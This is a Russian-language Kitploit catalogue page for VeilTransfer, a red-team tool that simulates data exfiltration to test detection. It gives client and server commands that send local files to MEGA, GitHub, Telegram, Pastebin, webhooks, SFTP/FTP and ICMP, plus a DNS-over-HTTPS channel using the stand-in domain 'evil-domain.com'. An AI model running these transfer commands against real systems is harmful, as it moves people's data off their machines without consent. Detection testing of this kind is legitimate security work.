Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
VeilTransfer — VeilTransfer is a data exfiltration utility designed to test and enhance the detection capabilities. This tool simulates real-world data exfiltration techniques used by advanced threat actors, allowing organizations to evaluate and improve their security posture. | Kitploit
Инструменты/GitHubGitHub/infosecn1nja/veiltransfer
Data ExfiltrationNetwork SecurityPenetration TestingRed Teaming
GitHubinfosecn1nja/veiltransfer

VeilTransfer

VeilTransfer is a data exfiltration utility designed to test and enhance the detection capabilities. This tool simulates real-world data exfiltration techniques used by advanced threat actors, allowing organizations to evaluate and improve their security posture.

Репозиторий

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
157227 месяцев назадПроверено Kitploit

VeilTransfer 2.0

VeilTransfer — это утилита для эксфильтрации данных, предназначенная для проверки и повышения эффективности средств обнаружения. Этот инструмент имитирует реальные методы эксфильтрации данных, используемые опытными злоумышленниками, позволяя организациям оценивать и улучшать свою защиту. Используя множество методов эксфильтрации, таких как MEGA, GitHub, SFTP, WebDAV и другие, VeilTransfer помогает выявить пробелы в вашей обороне и гарантирует, что ваши решения безопасности готовы противостоять современным утечкам данных.

Поддерживаемые методы эксфильтрации

  • MEGA
  • GitHub
  • Dropbox
  • Telegram
  • Pastebin
  • WebDAV
  • Webhook
  • SFTP
  • FTP
  • DoH (DNS over HTTPS)
  • QUIC
  • ICMP

Карта MITRE ATT&CK

IDТехники
T1029Scheduled Transfer
T1020Automated Exfiltration
T1132.001Data Encoding: Standard Encoding
T1560.002Archive Collected Data: Archive via Library
T1567.001Exfiltration Over Web Service: Exfiltration to Code Repository
T1567.002Exfiltration Over Web Service: Exfiltration to Cloud Storage
T1567.003Exfiltration Over Web Service: Exfiltration to Text Storage
T1567.004Exfiltration Over Web Service: Exfiltration Over Webhook
T1048.003Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted Non-C2 Protocol
T1048.002Exfiltration Over Alternative Protocol: Exfiltration Over Asymmetric Encrypted Non-C2 Protocol

Дополнительные возможности

Генерация фейковых данных

VeilTransfer также поддерживает генерацию фейковых данных, включая:

  • Номера индонезийского удостоверения личности (KTP): Создание реалистичных номеров KTP и связанных данных.
  • Данные кредитных карт: Создание фейковых данных кредитных карт в формате PCI DSS, включая имя, фамилию, номер карты (Visa/MasterCard/AMEX) и срок действия.
  • Номера социального страхования (SSN): Генерация фейковых номеров SSN для использования в симуляциях и тестовых средах.
  • Медицинские записи: Генерация фейковых данных медицинских записей на индонезийском (id) или английском (en) языках.

Создание ZIP-архивов

Легко создавайте ZIP-архивы для объединения и сжатия данных; их можно использовать для эксфильтрации или тестирования различных сценариев. Поддерживается необязательное разбиение на несколько файлов в зависимости от размера.

Примеры использования

  • Операции Red Team: Разверните VeilTransfer во время учений Red Team, чтобы проверить Blue Team с помощью сложных и реалистичных сценариев эксфильтрации.
  • Совместная работа Purple Team: Взаимодействуйте с командами защиты для имитации и последующего обнаружения попыток эксфильтрации, совершенствуя как наступательную, так и оборонительную тактику.
  • Тестирование безопасности: Используйте VeilTransfer для проверки эффективности DLP, NDR, межсетевых экранов и других мер сетевой безопасности.

Примеры использования

Передача

Передача файла по SFTP

В этом примере показано, как безопасно передать файл на удалённый сервер с помощью протокола SFTP. Файл находится на локальной машине и передаётся в указанную удалённую директорию с использованием SSH-аутентификации.

root@kitploit:~
veiltransfer_client transfer sftp -localPath (/path/to/file or /path/to/directory) -remoteDir /remote/path -server example.com:22 -username user -password pass

Передача файлов на сервер WebDAV

В этом примере файлы из локальной директории загружаются на сервер WebDAV. Для аутентификации сервер требует имя пользователя и пароль. Параметр сервера включает схему URI (https:// или http://).

root@kitploit:~
veiltransfer_client transfer webdav -localPath (/path/to/file or /path/to/directory) -remoteDir /remote/path -server http://webdav.example.com:8080 -username user -password pass

Передача файлов в Mega Cloud

В этом примере показано, как передавать файлы в облачное хранилище Mega Cloud. Файлы загружаются из указанной локальной директории, а аутентификация выполняется с использованием учётных данных пользователя Mega Cloud.

root@kitploit:~
veiltransfer_client transfer mega -localPath (/path/to/file or /path/to/directory) -username [email protected] -password megasecretpassword

Передача файлов по FTP

В этом примере файл загружается на FTP-сервер. Файл передаётся в указанную директорию на удалённом сервере. Для аутентификации сервер требует имя пользователя и пароль.

root@kitploit:~
veiltransfer_client transfer ftp -localPath (/path/to/file or /path/to/directory) -remoteDir /remote/path -server ftp.example.com:21 -username ftpuser -password ftppassword

Загрузка файла на Pastebin

В этом примере показано, как загрузить содержимое файла на Pastebin. Содержимое публикуется на Pastebin с использованием API-ключа, предоставленного пользователем.

root@kitploit:~
veiltransfer_client transfer pastebin -localPath (/path/to/file or /path/to/directory) -apiKey your_pastebin_api_key

Отправка файла в репозиторий GitHub

В этом примере показано, как отправить файл с локальной машины в конкретный репозиторий GitHub. Файл добавляется в репозиторий с использованием API-токена GitHub пользователя для аутентификации.

root@kitploit:~
veiltransfer_client transfer github -localPath (/path/to/file or /path/to/directory) -repo yourusername/repository -apiKey your_github_api_token

Отправка файла в Telegram-канал

В этом примере показано, как отправить файл в конкретный Telegram-канал. Файл отправляется с использованием API-токена Telegram-бота, а сообщение доставляется в указанный ID канала.

root@kitploit:~
veiltransfer_client transfer telegram -localPath (/path/to/file or /path/to/directory) -telegramAPI your_telegram_bot_api_token -channelID 123456789

Отправка данных на Webhook URL

В этом примере содержимое файла отправляется на указанный Webhook URL.

root@kitploit:~
veiltransfer_client transfer webhook -localPath (/path/to/file or /path/to/directory) -webhookURL https://webhook.site/your-webhook-url

Передача файлов через DoH (DNS over HTTPS)

Чтобы создать защищённый механизм эксфильтрации данных с использованием DNS over HTTPS (DoH), необходимо настроить следующие DNS-записи:

  1. A-запись: Укажите test на IP-адрес <VeilTransfer_IP_Address>.

    test -> <VeilTransfer_IP_Address>

  2. NS-запись: Определите поддомен (exfil), управляемый доменом evil-domain.com.

    exfil -> test.evil-domain.com

Домен exfil.evil-domain.com будет использоваться в качестве DNS Exfil-домена.

Затем запустите сервер VeilTransfer в режиме DoH следующей командой:

root@kitploit:~
veiltransfer_server doh -key ag36rjsg284nfk2g -folder /root/data/exfil

Примечание: длина ключа шифрования (-key) должна составлять 16 или 32 символа.

Чтобы загружать файлы через DoH, убедитесь, что сервер VeilTransfer активно работает в режиме DoH с действительным ключом шифрования. Затем запустите передачу с помощью клиентской команды:

root@kitploit:~
veiltransfer_client transfer doh -localPath /path/to/file_or_directory -key ag36rjsg284nfk2g -dnsServer exfil.evil-domain.com

Передача файлов через QUIC

Чтобы запустить сервер VeilTransfer в режиме QUIC, используйте следующую команду:

root@kitploit:~
veiltransfer_server quic -cert /path/server.crt -key /path/server.key

После запуска сервера вы можете загружать файлы или директории с помощью:

root@kitploit:~
veiltransfer_client transfer quic -localPath (/path/to/file or /path/to/directory) -server example.com:443

Передача файлов через ICMP

Чтобы включить передачу файлов по протоколу ICMP, запустите сервер VeilTransfer в режиме ICMP, выполнив следующую команду:

root@kitploit:~
veiltransfer_server_linux icmp -folder /path/folder

Когда сервер активен, выполните следующую команду для передачи файлов или директорий через ICMP:

root@kitploit:~
veiltransfer_client_linux transfer icmp -localPath (/path/to/file or /path/to/directory) -server <ip address>

Создание ZIP-файлов

Создание простого ZIP-файла

Создаёт ZIP-архив из указанной директории.

root@kitploit:~
veiltransfer_client create-zip -localPath /path/to/directory -outputPath /path/to/output.zip

Создание разделённого ZIP-файла

Создаёт ZIP-архив, разделённый на несколько частей в зависимости от указанного размера.

root@kitploit:~
veiltransfer_client create-zip -localPath /path/to/directory -outputPath /path/to/output.zip -splitSize 1000000

Генератор данных

Генерация 100 фейковых номеров кредитных карт

В этом примере показано, как сгенерировать 100 записей фейковых данных кредитных карт. Сгенерированные данные будут включать номера карт, сроки действия и связанные сведения.

root@kitploit:~
veiltransfer_client generate-fake -ccn -count 100

Генерация 50 фейковых записей индонезийских KTP

В этом примере показано, как сгенерировать 50 записей фейковых данных KTP — индонезийских удостоверений личности. Данные включают личную информацию, такую как имя, адрес и номер KTP.

root@kitploit:~
veiltransfer_client generate-fake -ktp -count 50

Генерация 200 фейковых номеров социального страхования

Сгенерированные данные включают номера социального страхования, отформатированные в соответствии со стандартами США.

root@kitploit:~
veiltransfer_client generate-fake -ssn -count 200

Генерация 300 фейковых медицинских записей на английском языке

В этом примере показано, как сгенерировать 300 фейковых медицинских записей на английском языке.

root@kitploit:~
veiltransfer_client generate-fake -medical-record -count 300 -language en

Участие в разработке

Вклад в развитие VeilTransfer приветствуется! Если у вас есть идеи для новых функций, методов эксфильтрации или улучшений, отправьте pull request или откройте issue на GitHub.

Скачать инструмент